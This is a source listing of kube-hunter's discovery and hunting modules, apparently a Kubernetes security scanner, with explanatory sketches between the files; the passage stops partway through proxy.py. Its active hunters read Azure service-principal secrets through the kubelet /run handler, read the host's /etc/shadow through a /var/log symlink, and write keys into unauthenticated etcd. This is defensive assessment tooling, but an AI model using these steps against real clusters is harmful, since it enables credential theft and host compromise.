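Because list_all_k8s_cluster_nodes is a generator that swallows configuration errors, callers can iterate it directly and simply get nothing when neither a kubeconfig nor an in-cluster service account is available. A hypothetical usage sketch (the kubeconfig path is an assumption):

from kube_hunter.modules.discovery.kubernetes_client import list_all_k8s_cluster_nodes

# yields node addresses, or nothing if no Kubernetes config can be loaded
for address in list_all_k8s_cluster_nodes(kube_config="/home/user/.kube/config"):
    print(address)
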
/kube_hunter/modules/discovery/ports.py:
--------------------------------------------------------------------------------
1 | import logging
2 | from socket import socket
3 |
4 | from kube_hunter.core.types import Discovery
5 | from kube_hunter.core.events.event_handler import handler
6 | from kube_hunter.core.events.types import NewHostEvent, OpenPortEvent
7 |
8 | logger = logging.getLogger(__name__)
9 | default_ports = [8001, 8080, 10250, 10255, 30000, 443, 6443, 2379]
10 |
11 |
12 | @handler.subscribe(NewHostEvent)
13 | class PortDiscovery(Discovery):
14 | """Port Scanning
15 |     Scans well-known Kubernetes ports to determine open endpoints for discovery
16 | """
17 |
18 | def __init__(self, event):
19 | self.event = event
20 | self.host = event.host
21 | self.port = event.port
22 |
23 | def execute(self):
24 | logger.debug(f"host {self.host} try ports: {default_ports}")
25 | for single_port in default_ports:
26 | if self.test_connection(self.host, single_port):
27 | logger.debug(f"Reachable port found: {single_port}")
28 | self.publish_event(OpenPortEvent(port=single_port))
29 |
30 | @staticmethod
31 | def test_connection(host, port):
32 | s = socket()
33 | s.settimeout(1.5)
34 | try:
35 | logger.debug(f"Scanning {host}:{port}")
36 | success = s.connect_ex((str(host), port))
37 | if success == 0:
38 | return True
39 | except Exception:
40 | logger.debug(f"Failed to probe {host}:{port}")
41 | finally:
42 | s.close()
43 | return False
44 |
--------------------------------------------------------------------------------
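
test_connection relies on connect_ex, which returns 0 when the TCP handshake succeeds and an errno value otherwise, so the whole scan reduces to checking for 0. The same idea as a self-contained sketch; the host and port list below are illustrative assumptions:

from socket import socket


def open_ports(host, ports, timeout=1.5):
    found = []
    for port in ports:
        s = socket()
        s.settimeout(timeout)
        try:
            if s.connect_ex((host, port)) == 0:  # 0 means the TCP handshake succeeded
                found.append(port)
        finally:
            s.close()
    return found


print(open_ports("127.0.0.1", [8001, 6443, 10250, 10255, 30000]))
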
/kube_hunter/modules/discovery/proxy.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import requests
3 |
4 | from kube_hunter.conf import get_config
5 | from kube_hunter.core.types import Discovery
6 | from kube_hunter.core.events.event_handler import handler
7 | from kube_hunter.core.events.types import Service, Event, OpenPortEvent
8 |
9 | logger = logging.getLogger(__name__)
10 |
11 |
12 | class KubeProxyEvent(Event, Service):
13 |     """Proxies from a localhost address to the Kubernetes API server"""
14 |
15 | def __init__(self):
16 | Service.__init__(self, name="Kubernetes Proxy")
17 |
18 |
19 | @handler.subscribe(OpenPortEvent, predicate=lambda x: x.port == 8001)
20 | class KubeProxy(Discovery):
21 | """Proxy Discovery
22 |     Checks for the existence of an open Proxy service
23 | """
24 |
25 | def __init__(self, event):
26 | self.event = event
27 | self.host = event.host
28 | self.port = event.port or 8001
29 |
30 | @property
31 |     def accessible(self):
32 | config = get_config()
33 | endpoint = f"http://{self.host}:{self.port}/api/v1"
34 | logger.debug("Attempting to discover a proxy service")
35 | try:
36 | r = requests.get(endpoint, timeout=config.network_timeout)
37 | if r.status_code == 200 and "APIResourceList" in r.text:
38 | return True
39 | except requests.Timeout:
40 | logger.debug(f"failed to get {endpoint}", exc_info=True)
41 | return False
42 |
43 | def execute(self):
44 |         if self.accessible:
45 | self.publish_event(KubeProxyEvent())
46 |
--------------------------------------------------------------------------------
/kube_hunter/modules/hunting/__init__.py:
--------------------------------------------------------------------------------
1 | # flake8: noqa: E402
2 | from . import (
3 | aks,
4 | apiserver,
5 | capabilities,
6 | certificates,
7 | cves,
8 | dashboard,
9 | etcd,
10 | kubelet,
11 | mounts,
12 | proxy,
13 | secrets,
14 | )
15 |
--------------------------------------------------------------------------------
/kube_hunter/modules/hunting/aks.py:
--------------------------------------------------------------------------------
1 | import os
2 | import json
3 | import logging
4 | import requests
5 |
6 | from kube_hunter.conf import get_config
7 | from kube_hunter.modules.hunting.kubelet import ExposedPodsHandler, SecureKubeletPortHunter
8 | from kube_hunter.core.events.event_handler import handler
9 | from kube_hunter.core.events.types import Event, Vulnerability
10 | from kube_hunter.core.types import Hunter, ActiveHunter, MountServicePrincipalTechnique, Azure
11 |
12 | logger = logging.getLogger(__name__)
13 |
14 |
15 | class AzureSpnExposure(Vulnerability, Event):
16 | """The SPN is exposed, potentially allowing an attacker to gain access to the Azure subscription"""
17 |
18 | def __init__(self, container, evidence=""):
19 | Vulnerability.__init__(
20 | self,
21 | Azure,
22 | "Azure SPN Exposure",
23 | category=MountServicePrincipalTechnique,
24 | vid="KHV004",
25 | )
26 | self.container = container
27 | self.evidence = evidence
28 |
29 |
30 | @handler.subscribe(ExposedPodsHandler, predicate=lambda x: x.cloud_type == "Azure")
31 | class AzureSpnHunter(Hunter):
32 | """AKS Hunting
33 | Hunting Azure cluster deployments using specific known configurations
34 | """
35 |
36 | def __init__(self, event):
37 | self.event = event
38 | self.base_url = f"https://{self.event.host}:{self.event.port}"
39 |
40 | # getting a container that has access to the azure.json file
41 | def get_key_container(self):
42 | logger.debug("Trying to find container with access to azure.json file")
43 |
44 | # pods are saved in the previous event object
45 | pods_data = self.event.pods
46 |
47 | suspicious_volume_names = []
48 | for pod_data in pods_data:
49 | for volume in pod_data["spec"].get("volumes", []):
50 | if volume.get("hostPath"):
51 | path = volume["hostPath"]["path"]
52 | if "/etc/kubernetes/azure.json".startswith(path):
53 | suspicious_volume_names.append(volume["name"])
54 | for container in pod_data["spec"]["containers"]:
55 | for mount in container.get("volumeMounts", []):
56 | if mount["name"] in suspicious_volume_names:
57 | return {
58 | "name": container["name"],
59 | "pod": pod_data["metadata"]["name"],
60 | "namespace": pod_data["metadata"]["namespace"],
61 | "mount": mount,
62 | }
63 |
64 | def execute(self):
65 | container = self.get_key_container()
66 | if container:
67 | evidence = f"pod: {container['pod']}, namespace: {container['namespace']}"
68 | self.publish_event(AzureSpnExposure(container=container, evidence=evidence))
69 |
70 |
71 | @handler.subscribe(AzureSpnExposure)
72 | class ProveAzureSpnExposure(ActiveHunter):
73 | """Azure SPN Hunter
74 | Gets the azure subscription file on the host by executing inside a container
75 | """
76 |
77 | def __init__(self, event):
78 | self.event = event
79 | self.base_url = f"https://{self.event.host}:{self.event.port}"
80 |
81 | def test_run_capability(self):
82 | """
83 | Uses SecureKubeletPortHunter to test the /run handler
84 | TODO: when multiple event subscription is implemented, use this here to make sure /run is accessible
85 | """
86 | debug_handlers = SecureKubeletPortHunter.DebugHandlers(path=self.base_url, session=self.event.session, pod=None)
87 | return debug_handlers.test_run_container()
88 |
89 | def run(self, command, container):
90 | config = get_config()
91 | run_url = f"{self.base_url}/run/{container['namespace']}/{container['pod']}/{container['name']}"
92 | return self.event.session.post(run_url, verify=False, params={"cmd": command}, timeout=config.network_timeout)
93 |
94 | def get_full_path_to_azure_file(self):
95 | """
96 | Returns a full path to /etc/kubernetes/azure.json
97 |         Taking into consideration that the mount may map the file under a different folder inside the container.
98 |         TODO: implement the edge case where the mount is to the parent /etc folder.
99 | """
100 | azure_file_path = self.event.container["mount"]["mountPath"]
101 |
102 | # taking care of cases where a subPath is added to map the specific file
103 | if not azure_file_path.endswith("azure.json"):
104 | azure_file_path = os.path.join(azure_file_path, "azure.json")
105 |
106 | return azure_file_path
107 |
108 | def execute(self):
109 | if not self.test_run_capability():
110 | logger.debug("Not proving AzureSpnExposure because /run debug handler is disabled")
111 | return
112 |
113 | try:
114 | azure_file_path = self.get_full_path_to_azure_file()
115 | logger.debug(f"trying to access the azure.json at the resolved path: {azure_file_path}")
116 | subscription = self.run(f"cat {azure_file_path}", container=self.event.container).json()
117 | except requests.Timeout:
118 | logger.debug("failed to run command in container", exc_info=True)
119 | except json.decoder.JSONDecodeError:
120 | logger.warning("failed to parse SPN")
121 | else:
122 | if "subscriptionId" in subscription:
123 | self.event.subscriptionId = subscription["subscriptionId"]
124 | self.event.aadClientId = subscription["aadClientId"]
125 | self.event.aadClientSecret = subscription["aadClientSecret"]
126 | self.event.tenantId = subscription["tenantId"]
127 | self.event.evidence = f"subscription: {self.event.subscriptionId}"
128 |
--------------------------------------------------------------------------------
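
ProveAzureSpnExposure expects the azure.json it reads out of the container to parse into a JSON object carrying the service principal fields it copies onto the event. A sketch of just that parsing step against placeholder data (all values below are assumptions standing in for real AKS output, not actual file contents):

import json

# placeholder document standing in for /etc/kubernetes/azure.json
sample = json.dumps({
    "tenantId": "00000000-0000-0000-0000-000000000000",
    "subscriptionId": "11111111-1111-1111-1111-111111111111",
    "aadClientId": "22222222-2222-2222-2222-222222222222",
    "aadClientSecret": "<redacted>",
})

subscription = json.loads(sample)
if "subscriptionId" in subscription:
    print(f"subscription: {subscription['subscriptionId']}")
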
/kube_hunter/modules/hunting/capabilities.py:
--------------------------------------------------------------------------------
1 | import socket
2 | import logging
3 |
4 | from kube_hunter.modules.discovery.hosts import RunningAsPodEvent
5 | from kube_hunter.core.events.event_handler import handler
6 | from kube_hunter.core.events.types import Event, Vulnerability
7 | from kube_hunter.core.types import Hunter, ARPPoisoningTechnique, KubernetesCluster
8 |
9 | logger = logging.getLogger(__name__)
10 |
11 |
12 | class CapNetRawEnabled(Event, Vulnerability):
13 | """CAP_NET_RAW is enabled by default for pods.
14 | If an attacker manages to compromise a pod,
15 | they could potentially take advantage of this capability to perform network
16 | attacks on other pods running on the same node"""
17 |
18 | def __init__(self):
19 | Vulnerability.__init__(
20 | self,
21 | KubernetesCluster,
22 | name="CAP_NET_RAW Enabled",
23 | category=ARPPoisoningTechnique,
24 | )
25 |
26 |
27 | @handler.subscribe(RunningAsPodEvent)
28 | class PodCapabilitiesHunter(Hunter):
29 | """Pod Capabilities Hunter
30 | Checks for default enabled capabilities in a pod
31 | """
32 |
33 | def __init__(self, event):
34 | self.event = event
35 |
36 | def check_net_raw(self):
37 |         logger.debug("Passive hunter is trying to open a RAW socket")
38 | try:
39 | # trying to open a raw socket without CAP_NET_RAW will raise PermissionsError
40 | s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
41 | s.close()
42 |             logger.debug("Passive hunter is closing the RAW socket")
43 | return True
44 | except PermissionError:
45 | logger.debug("CAP_NET_RAW not enabled")
46 |
47 | def execute(self):
48 | if self.check_net_raw():
49 | self.publish_event(CapNetRawEnabled())
50 |
--------------------------------------------------------------------------------
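
The capability check is self-contained enough to run on its own: opening a raw socket requires CAP_NET_RAW, so a PermissionError is a reliable negative signal. A minimal sketch of the same probe:

import socket


def has_cap_net_raw():
    try:
        # opening a raw socket without CAP_NET_RAW raises PermissionError
        s = socket.socket(socket.AF_INET, socket.SOCK_RAW, socket.IPPROTO_RAW)
        s.close()
        return True
    except PermissionError:
        return False


print(has_cap_net_raw())
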
/kube_hunter/modules/hunting/certificates.py:
--------------------------------------------------------------------------------
1 | import ssl
2 | import logging
3 | import base64
4 | import re
5 |
6 | from kube_hunter.core.types import Hunter, KubernetesCluster, GeneralSensitiveInformationTechnique
7 | from kube_hunter.core.events.event_handler import handler
8 | from kube_hunter.core.events.types import Vulnerability, Event, Service
9 |
10 | logger = logging.getLogger(__name__)
11 | email_pattern = re.compile(rb"([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)")
12 |
13 |
14 | class CertificateEmail(Vulnerability, Event):
15 |     """The Kubernetes API Server advertises a public certificate for TLS.
16 |     This certificate includes an email address that may provide an attacker with additional
17 |     information about your organization, or be abused for further email-based attacks."""
18 |
19 | def __init__(self, email):
20 | Vulnerability.__init__(
21 | self,
22 | KubernetesCluster,
23 | "Certificate Includes Email Address",
24 | category=GeneralSensitiveInformationTechnique,
25 | vid="KHV021",
26 | )
27 | self.email = email
28 | self.evidence = f"email: {self.email}"
29 |
30 |
31 | @handler.subscribe(Service)
32 | class CertificateDiscovery(Hunter):
33 | """Certificate Email Hunting
34 | Checks for email addresses in kubernetes ssl certificates
35 | """
36 |
37 | def __init__(self, event):
38 | self.event = event
39 |
40 | def execute(self):
41 | try:
42 | logger.debug("Passive hunter is attempting to get server certificate")
43 | addr = (str(self.event.host), self.event.port)
44 | cert = ssl.get_server_certificate(addr)
45 | except ssl.SSLError:
46 | # If the server doesn't offer SSL on this port we won't get a certificate
47 | return
48 | self.examine_certificate(cert)
49 |
50 |     def examine_certificate(self, cert):
51 |         # str.strip removes characters, not substrings; use replace to drop the PEM armor
52 |         c = cert.replace(ssl.PEM_HEADER, "").replace(ssl.PEM_FOOTER, "").strip("\n")
53 |         certdata = base64.b64decode(c)
54 |         emails = re.findall(email_pattern, certdata)
55 |         for email in emails:
56 |             self.publish_event(CertificateEmail(email=email))
57 |
--------------------------------------------------------------------------------
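
The whole hunt is: fetch the certificate, strip the PEM armor, and scan the DER bytes for email-shaped strings. As a standalone sketch (the target host is an illustrative assumption):

import base64
import re
import ssl

EMAIL_PATTERN = re.compile(rb"([a-zA-Z0-9_.+-]+@[a-zA-Z0-9-]+\.[a-zA-Z0-9-.]+)")


def certificate_emails(host, port=443):
    pem = ssl.get_server_certificate((host, port))
    der = base64.b64decode(pem.replace(ssl.PEM_HEADER, "").replace(ssl.PEM_FOOTER, ""))
    return EMAIL_PATTERN.findall(der)


print(certificate_emails("example.com"))
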
/kube_hunter/modules/hunting/dashboard.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import json
3 | import requests
4 |
5 | from kube_hunter.conf import get_config
6 | from kube_hunter.core.types import Hunter, AccessK8sDashboardTechnique, KubernetesCluster
7 | from kube_hunter.core.events.event_handler import handler
8 | from kube_hunter.core.events.types import Vulnerability, Event
9 | from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent
10 |
11 | logger = logging.getLogger(__name__)
12 |
13 |
14 | class DashboardExposed(Vulnerability, Event):
15 | """All operations on the cluster are exposed"""
16 |
17 | def __init__(self, nodes):
18 | Vulnerability.__init__(
19 | self,
20 | KubernetesCluster,
21 | "Dashboard Exposed",
22 | category=AccessK8sDashboardTechnique,
23 | vid="KHV029",
24 | )
25 | self.evidence = "nodes: {}".format(" ".join(nodes)) if nodes else None
26 |
27 |
28 | @handler.subscribe(KubeDashboardEvent)
29 | class KubeDashboard(Hunter):
30 | """Dashboard Hunting
31 | Hunts open Dashboards, gets the type of nodes in the cluster
32 | """
33 |
34 | def __init__(self, event):
35 | self.event = event
36 |
37 | def get_nodes(self):
38 | config = get_config()
39 | logger.debug("Passive hunter is attempting to get nodes types of the cluster")
40 | r = requests.get(f"http://{self.event.host}:{self.event.port}/api/v1/node", timeout=config.network_timeout)
41 | if r.status_code == 200 and "nodes" in r.text:
42 | return [node["objectMeta"]["name"] for node in json.loads(r.text)["nodes"]]
43 |
44 | def execute(self):
45 | self.publish_event(DashboardExposed(nodes=self.get_nodes()))
46 |
--------------------------------------------------------------------------------
/kube_hunter/modules/hunting/etcd.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import requests
3 |
4 | from kube_hunter.conf import get_config
5 | from kube_hunter.core.events.event_handler import handler
6 | from kube_hunter.core.events.types import Vulnerability, Event, OpenPortEvent
7 | from kube_hunter.core.types import (
8 | ActiveHunter,
9 | Hunter,
10 | KubernetesCluster,
11 | GeneralSensitiveInformationTechnique,
12 | GeneralPersistenceTechnique,
13 | ListK8sSecretsTechnique,
14 | ExposedSensitiveInterfacesTechnique,
15 | )
16 |
17 | logger = logging.getLogger(__name__)
18 | ETCD_PORT = 2379
19 |
20 |
21 | """ Vulnerabilities """
22 |
23 |
24 | class EtcdRemoteWriteAccessEvent(Vulnerability, Event):
25 | """Remote write access might grant an attacker full control over the kubernetes cluster"""
26 |
27 | def __init__(self, write_res):
28 | Vulnerability.__init__(
29 | self,
30 | KubernetesCluster,
31 | name="Etcd Remote Write Access Event",
32 | category=GeneralPersistenceTechnique,
33 | vid="KHV031",
34 | )
35 | self.evidence = write_res
36 |
37 |
38 | class EtcdRemoteReadAccessEvent(Vulnerability, Event):
39 |     """Remote read access might expose the cluster's secrets, configuration, and other valuable data to an attacker."""
40 |
41 | def __init__(self, keys):
42 | Vulnerability.__init__(
43 | self,
44 | KubernetesCluster,
45 | name="Etcd Remote Read Access Event",
46 | category=ListK8sSecretsTechnique,
47 | vid="KHV032",
48 | )
49 | self.evidence = keys
50 |
51 |
52 | class EtcdRemoteVersionDisclosureEvent(Vulnerability, Event):
53 |     """Remote version disclosure might give an attacker valuable data for attacking a cluster"""
54 |
55 | def __init__(self, version):
56 |
57 | Vulnerability.__init__(
58 | self,
59 | KubernetesCluster,
60 | name="Etcd Remote version disclosure",
61 | category=GeneralSensitiveInformationTechnique,
62 | vid="KHV033",
63 | )
64 | self.evidence = version
65 |
66 |
67 | class EtcdAccessEnabledWithoutAuthEvent(Vulnerability, Event):
68 |     """Etcd is accessible using HTTP (without authorization or authentication),
69 |     which would allow a potential attacker to
70 |     gain access to etcd"""
71 |
72 | def __init__(self, version):
73 | Vulnerability.__init__(
74 | self,
75 | KubernetesCluster,
76 | name="Etcd is accessible using insecure connection (HTTP)",
77 | category=ExposedSensitiveInterfacesTechnique,
78 | vid="KHV034",
79 | )
80 | self.evidence = version
81 |
82 |
83 | # Active Hunter
84 | @handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == ETCD_PORT)
85 | class EtcdRemoteAccessActive(ActiveHunter):
86 | """Etcd Remote Access
87 | Checks for remote write access to etcd, will attempt to add a new key to the etcd DB"""
88 |
89 | def __init__(self, event):
90 | self.event = event
91 | self.write_evidence = ""
92 | self.event.protocol = "https"
93 |
94 | def db_keys_write_access(self):
95 | config = get_config()
96 | logger.debug(f"Trying to write keys remotely on host {self.event.host}")
97 | data = {"value": "remotely written data"}
98 | try:
99 | r = requests.post(
100 | f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys/message",
101 | data=data,
102 | timeout=config.network_timeout,
103 | )
104 | self.write_evidence = r.content if r.status_code == 200 and r.content else False
105 | return self.write_evidence
106 | except requests.exceptions.ConnectionError:
107 | return False
108 |
109 | def execute(self):
110 | if self.db_keys_write_access():
111 | self.publish_event(EtcdRemoteWriteAccessEvent(self.write_evidence))
112 |
113 |
114 | # Passive Hunter
115 | @handler.subscribe(OpenPortEvent, predicate=lambda p: p.port == ETCD_PORT)
116 | class EtcdRemoteAccess(Hunter):
117 | """Etcd Remote Access
118 | Checks for remote availability of etcd, its version, and read access to the DB
119 | """
120 |
121 | def __init__(self, event):
122 | self.event = event
123 | self.version_evidence = ""
124 | self.keys_evidence = ""
125 | self.event.protocol = "https"
126 |
127 | def db_keys_disclosure(self):
128 | config = get_config()
129 | logger.debug(f"{self.event.host} Passive hunter is attempting to read etcd keys remotely")
130 | try:
131 | r = requests.get(
132 | f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/v2/keys",
133 | verify=False,
134 | timeout=config.network_timeout,
135 | )
136 |             self.keys_evidence = r.content if r.status_code == 200 and r.content else False
137 | return self.keys_evidence
138 | except requests.exceptions.ConnectionError:
139 | return False
140 |
141 | def version_disclosure(self):
142 | config = get_config()
143 | logger.debug(f"Trying to check etcd version remotely at {self.event.host}")
144 | try:
145 | r = requests.get(
146 | f"{self.event.protocol}://{self.event.host}:{ETCD_PORT}/version",
147 | verify=False,
148 | timeout=config.network_timeout,
149 | )
150 | self.version_evidence = r.content if r.status_code == 200 and r.content else False
151 | return self.version_evidence
152 | except requests.exceptions.ConnectionError:
153 | return False
154 |
155 | def insecure_access(self):
156 | config = get_config()
157 | logger.debug(f"Trying to access etcd insecurely at {self.event.host}")
158 | try:
159 | r = requests.get(
160 | f"http://{self.event.host}:{ETCD_PORT}/version",
161 | verify=False,
162 | timeout=config.network_timeout,
163 | )
164 | return r.content if r.status_code == 200 and r.content else False
165 | except requests.exceptions.ConnectionError:
166 | return False
167 |
168 | def execute(self):
169 | if self.insecure_access(): # make a decision between http and https protocol
170 | self.event.protocol = "http"
171 | if self.version_disclosure():
172 | self.publish_event(EtcdRemoteVersionDisclosureEvent(self.version_evidence))
173 | if self.event.protocol == "http":
174 | self.publish_event(EtcdAccessEnabledWithoutAuthEvent(self.version_evidence))
175 | if self.db_keys_disclosure():
176 | self.publish_event(EtcdRemoteReadAccessEvent(self.keys_evidence))
177 |
--------------------------------------------------------------------------------
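
The passive etcd checks are plain unauthenticated GETs against well-known endpoints on port 2379. A minimal sketch of the version and key probes (the host is an assumption, and /v2/keys only exists where the legacy v2 API is enabled):

import requests
import urllib3

urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)


def probe_etcd(host, protocol="https", timeout=5):
    results = {}
    for name, path in (("version", "/version"), ("keys", "/v2/keys")):
        try:
            r = requests.get(f"{protocol}://{host}:2379{path}", verify=False, timeout=timeout)
            results[name] = r.content if r.status_code == 200 else None
        except requests.exceptions.ConnectionError:
            results[name] = None
    return results


print(probe_etcd("10.0.0.2"))
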
/kube_hunter/modules/hunting/mounts.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import re
3 | import uuid
4 |
5 | from kube_hunter.conf import get_config
6 | from kube_hunter.core.events.event_handler import handler
7 | from kube_hunter.core.events.types import Event, Vulnerability
8 | from kube_hunter.core.types import ActiveHunter, Hunter, KubernetesCluster, HostPathMountPrivilegeEscalationTechnique
9 | from kube_hunter.modules.hunting.kubelet import (
10 | ExposedPodsHandler,
11 | ExposedRunHandler,
12 | KubeletHandlers,
13 | )
14 |
15 | logger = logging.getLogger(__name__)
16 |
17 |
18 | class WriteMountToVarLog(Vulnerability, Event):
19 |     """A pod can create symlinks in the /var/log directory on the host, which can lead to a root directory traversal"""
20 |
21 | def __init__(self, pods):
22 | Vulnerability.__init__(
23 | self,
24 | KubernetesCluster,
25 | "Pod With Mount To /var/log",
26 | category=HostPathMountPrivilegeEscalationTechnique,
27 | vid="KHV047",
28 | )
29 | self.pods = pods
30 | self.evidence = "pods: {}".format(", ".join(pod["metadata"]["name"] for pod in self.pods))
31 |
32 |
33 | class DirectoryTraversalWithKubelet(Vulnerability, Event):
34 |     """An attacker can run commands on pods with a mount to /var/log,
35 |     and traverse-read all files on the host filesystem"""
36 |
37 | def __init__(self, output):
38 | Vulnerability.__init__(
39 | self,
40 | KubernetesCluster,
41 | "Root Traversal Read On The Kubelet",
42 | category=HostPathMountPrivilegeEscalationTechnique,
43 | )
44 | self.output = output
45 | self.evidence = f"output: {self.output}"
46 |
47 |
48 | @handler.subscribe(ExposedPodsHandler)
49 | class VarLogMountHunter(Hunter):
50 | """Mount Hunter - /var/log
51 |     Hunts pods that have write access to the host's /var/log. In such a case,
52 |     the pod can traverse-read files on the host machine
53 | """
54 |
55 | def __init__(self, event):
56 | self.event = event
57 |
58 | def has_write_mount_to(self, pod_data, path):
59 | """Returns volume for correlated writable mount"""
60 | for volume in pod_data["spec"]["volumes"]:
61 | if "hostPath" in volume:
62 |             if "Directory" in volume["hostPath"].get("type", ""):
63 | if volume["hostPath"]["path"].startswith(path):
64 | return volume
65 |
66 | def execute(self):
67 | pe_pods = []
68 | for pod in self.event.pods:
69 | if self.has_write_mount_to(pod, path="/var/log"):
70 | pe_pods.append(pod)
71 | if pe_pods:
72 | self.publish_event(WriteMountToVarLog(pods=pe_pods))
73 |
74 |
75 | @handler.subscribe_many([ExposedRunHandler, WriteMountToVarLog])
76 | class ProveVarLogMount(ActiveHunter):
77 | """Prove /var/log Mount Hunter
78 | Tries to read /etc/shadow on the host by running commands inside a pod with host mount to /var/log
79 | """
80 |
81 | def __init__(self, event):
82 |         self.write_mount_event = event.get_by_class(WriteMountToVarLog)
83 | self.event = self.write_mount_event
84 |
85 | self.base_path = f"https://{self.write_mount_event.host}:{self.write_mount_event.port}"
86 |
87 | def run(self, command, container):
88 | run_url = KubeletHandlers.RUN.value.format(
89 | podNamespace=container["namespace"],
90 | podID=container["pod"],
91 | containerName=container["name"],
92 | cmd=command,
93 | )
94 | return self.event.session.post(f"{self.base_path}/{run_url}", verify=False).text
95 |
96 | def mount_path_from_mountname(self, pod, mount_name):
97 | """returns container name, and container mount path correlated to mount_name"""
98 | for container in pod["spec"]["containers"]:
99 |             for volume_mount in container.get("volumeMounts", []):
100 | if volume_mount["name"] == mount_name:
101 | logger.debug(f"yielding {container}")
102 | yield container, volume_mount["mountPath"]
103 |
104 | def traverse_read(self, host_file, container, mount_path, host_path):
105 | """Returns content of file on the host, and cleans trails"""
106 | config = get_config()
107 | symlink_name = str(uuid.uuid4())
108 | # creating symlink to file
109 | self.run(f"ln -s {host_file} {mount_path}/{symlink_name}", container)
110 | # following symlink with kubelet
111 | path_in_logs_endpoint = KubeletHandlers.LOGS.value.format(
112 | path=re.sub(r"^/var/log", "", host_path) + symlink_name
113 | )
114 | content = self.event.session.get(
115 | f"{self.base_path}/{path_in_logs_endpoint}",
116 | verify=False,
117 | timeout=config.network_timeout,
118 | ).text
119 | # removing symlink
120 | self.run(f"rm {mount_path}/{symlink_name}", container=container)
121 | return content
122 |
123 |     def execute(self):
124 |         for pod in self.write_mount_event.pods:
125 |             # find the /var/log hostPath volumes recorded for this pod
126 |             varlog_volumes = [
127 |                 volume
128 |                 for volume in pod["spec"].get("volumes", [])
129 |                 if "hostPath" in volume and volume["hostPath"]["path"].startswith("/var/log")
130 |             ]
131 |             for volume in varlog_volumes:
132 |                 for container, mount_path in self.mount_path_from_mountname(pod, volume["name"]):
133 |                     logger.debug("Correlated container to mount_name")
134 |                     cont = {
135 |                         "name": container["name"],
136 |                         "pod": pod["metadata"]["name"],
137 |                         "namespace": pod["metadata"]["namespace"],
138 |                     }
139 |                     try:
140 |                         output = self.traverse_read(
141 |                             "/etc/shadow",
142 |                             container=cont,
143 |                             mount_path=mount_path,
144 |                             host_path=volume["hostPath"]["path"],
145 |                         )
146 |                         self.publish_event(DirectoryTraversalWithKubelet(output=output))
147 |                     except Exception:
148 |                         logger.debug("Could not exploit /var/log", exc_info=True)
149 |
--------------------------------------------------------------------------------
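
The traversal in traverse_read hinges on one trick: the kubelet's logs handler serves anything under the host's /var/log, and a pod that can write there can plant a symlink to an arbitrary host file. A sketch of just the command and path construction, decoupled from the kubelet calls; the mount and host paths are illustrative assumptions, and the logs path layout is assumed here rather than taken from KubeletHandlers:

import uuid

host_file = "/etc/shadow"   # file to read on the host
mount_path = "/host-logs"   # where the /var/log volume is mounted in the container (assumption)
host_path = "/var/log/"     # hostPath of the volume (assumption)
symlink = str(uuid.uuid4())

# run inside the container via the kubelet /run handler
create_cmd = f"ln -s {host_file} {mount_path}/{symlink}"
cleanup_cmd = f"rm {mount_path}/{symlink}"
# then fetched through the kubelet logs endpoint (path layout assumed)
logs_path = "logs/" + host_path.replace("/var/log", "", 1).lstrip("/") + symlink
print(create_cmd, logs_path, cleanup_cmd, sep="\n")
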
/kube_hunter/modules/hunting/proxy.py:
--------------------------------------------------------------------------------
1 | import logging
2 | import requests
3 |
4 | from enum import Enum
5 |
6 | from kube_hunter.conf import get_config
7 | from kube_hunter.core.events.event_handler import handler
8 | from kube_hunter.core.events.types import Event, Vulnerability, K8sVersionDisclosure
9 | from kube_hunter.core.types import (
10 | ActiveHunter,
11 | Hunter,
12 | KubernetesCluster,
13 | ConnectFromProxyServerTechnique,
14 | )
15 | from kube_hunter.modules.discovery.dashboard import KubeDashboardEvent
16 | from kube_hunter.modules.discovery.proxy import KubeProxyEvent
17 |
18 | logger = logging.getLogger(__name__)
19 |
20 |
21 | class KubeProxyExposed(Vulnerability, Event):
22 | """All operations on the cluster are exposed"""
23 |
24 | def __init__(self):
25 | Vulnerability.__init__(
26 | self,
27 | KubernetesCluster,
28 | "Proxy Exposed",
29 | category=ConnectFromProxyServerTechnique,
30 | vid="KHV049",
31 | )
32 |
33 |
34 | class Service(Enum):
35 | DASHBOARD = "kubernetes-dashboard"
36 |
37 |
38 | @handler.subscribe(KubeProxyEvent)
39 | class KubeProxy(Hunter):
40 | """Proxy Hunting
41 | Hunts for a dashboard behind the proxy
42 | """
43 |
44 | def __init__(self, event):
45 | self.event = event
46 | self.api_url = f"http://{self.event.host}:{self.event.port}/api/v1"
47 |
48 | def execute(self):
49 | self.publish_event(KubeProxyExposed())
50 | for namespace, services in self.services.items():
51 | for service in services:
52 | if service == Service.DASHBOARD.value:
53 | logger.debug(f"Found a dashboard service '{service}'")
54 | # TODO: check if /proxy is a convention on other services
55 | curr_path = f"api/v1/namespaces/{namespace}/services/{service}/proxy"
56 | self.publish_event(KubeDashboardEvent(path=curr_path, secure=False))
57 |
58 | @property
59 | def namespaces(self):
60 | config = get_config()
61 | resource_json = requests.get(f"{self.api_url}/namespaces", timeout=config.network_timeout).json()
62 | return self.extract_names(resource_json)
63 |
64 | @property
65 | def services(self):
66 | config = get_config()
67 | # map between namespaces and service names
68 | services = dict()
69 | for namespace in self.namespaces:
70 | resource_path = f"{self.api_url}/namespaces/{namespace}/services"
71 | resource_json = requests.get(resource_path, timeout=config.network_timeout).json()
72 | services[namespace] = self.extract_names(resource_json)
73 | logger.debug(f"Enumerated services [{' '.join(services)}]")
74 | return services
75 |
76 | @staticmethod
77 | def extract_names(resource_json):
78 | names = list()
79 | for item in resource_json["items"]:
80 | names.append(item["metadata"]["name"])
81 | return names
82 |
83 |
84 | @handler.subscribe(KubeProxyExposed)
85 | class ProveProxyExposed(ActiveHunter):
86 | """Build Date Hunter
87 |     When the proxy is exposed, extracts the build date of Kubernetes
88 | """
89 |
90 | def __init__(self, event):
91 | self.event = event
92 |
93 | def execute(self):
94 | config = get_config()
95 | version_metadata = requests.get(
96 | f"http://{self.event.host}:{self.event.port}/version",
97 | verify=False,
98 | timeout=config.network_timeout,
99 | ).json()
100 | if "buildDate" in version_metadata:
